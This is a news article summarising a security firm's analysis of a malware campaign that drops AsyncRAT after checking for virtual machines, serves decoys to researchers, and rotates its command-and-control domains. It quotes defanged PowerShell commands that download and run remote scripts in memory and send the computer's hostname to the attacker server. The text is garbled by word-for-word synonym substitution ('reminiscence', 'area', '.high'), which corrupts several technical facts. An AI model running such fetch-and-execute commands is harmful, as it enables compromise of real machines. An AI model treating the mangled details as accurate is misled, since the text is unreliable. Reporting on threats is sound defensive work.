The payload is one other encoded script written in PowerShell that’s executed straight in reminiscence with out being saved to disk with a “conhost –headless powershell iex(curl -useb sduyvzep[.]high/1.php?hash=)” command. The area of the C&C server is rotated periodically.
The PowerShell script executes yet one more PowerShell script by invoking the iex(curl -useb “http://sduyvzep[.]high/2.php?id=$env:computername&key=$wiqnfex”) command. This sends some info to the C&C server similar to the pc hostname and a variable referred to as $wiqnfex that signifies the chance of the pc being a digital machine or sandbox. This worth is ready after the primary performs a number of checks for the system’s graphics card adapter and BIOS, which might be emulated in a VM.
If the C&C server determines the $wiqnfex signifies a legitimate goal, the server deploys AsyncRAT. If the variable worth signifies a doable VM or sandbox, it redirects the request to Google or to a distinct PowerShell script that downloads and launches a decoy RAT.
“When decompiled, the RAT is definitely a distraction for any researchers wanting into the marketing campaign,” the Alien Lab researchers mentioned. “The pattern is a decoy made to resemble a RAT for a number of causes. The meeting identify is DecoyClient, and the configuration isn’t encrypted as it will be in an AsyncRAT pattern. Moreover, the pattern doesn’t comprise a C&C server, solely loopback addresses. Moreover, among the many knowledge to be exfiltrated to the C&C, is the string ‘LOL’ or the group ‘GOVNO’.”
A brand new command-and-control area each week
Along with frequently randomizing the script code and malware samples to evade detection, the attackers additionally rotate the C&C domains each week. Nevertheless, the Alien Lab researchers managed to reverse-engineer the area technology algorithm, which along with a number of different constants such because the TLD (.high), registrar, and group identify used to register the domains, and have been capable of finding the domains used up to now and procure previous samples of the deployment scripts.
“These domains have been noticed to hold the identical options as talked about earlier than, with the distinction of being 15 characters lengthy,” the researchers mentioned. “This permits us to pivot and discover historic samples primarily based off the DGA, in addition to construct detections to determine future infrastructure regardless of all their efforts to evade EDR and static detections.” The AT&T Alien Labs report contains detection signatures for this marketing campaign that can be utilized with the open-source Suricata intrusion detection system in addition to a listing of indicators of compromise (IOC) that can be utilized to construct detections for different programs.
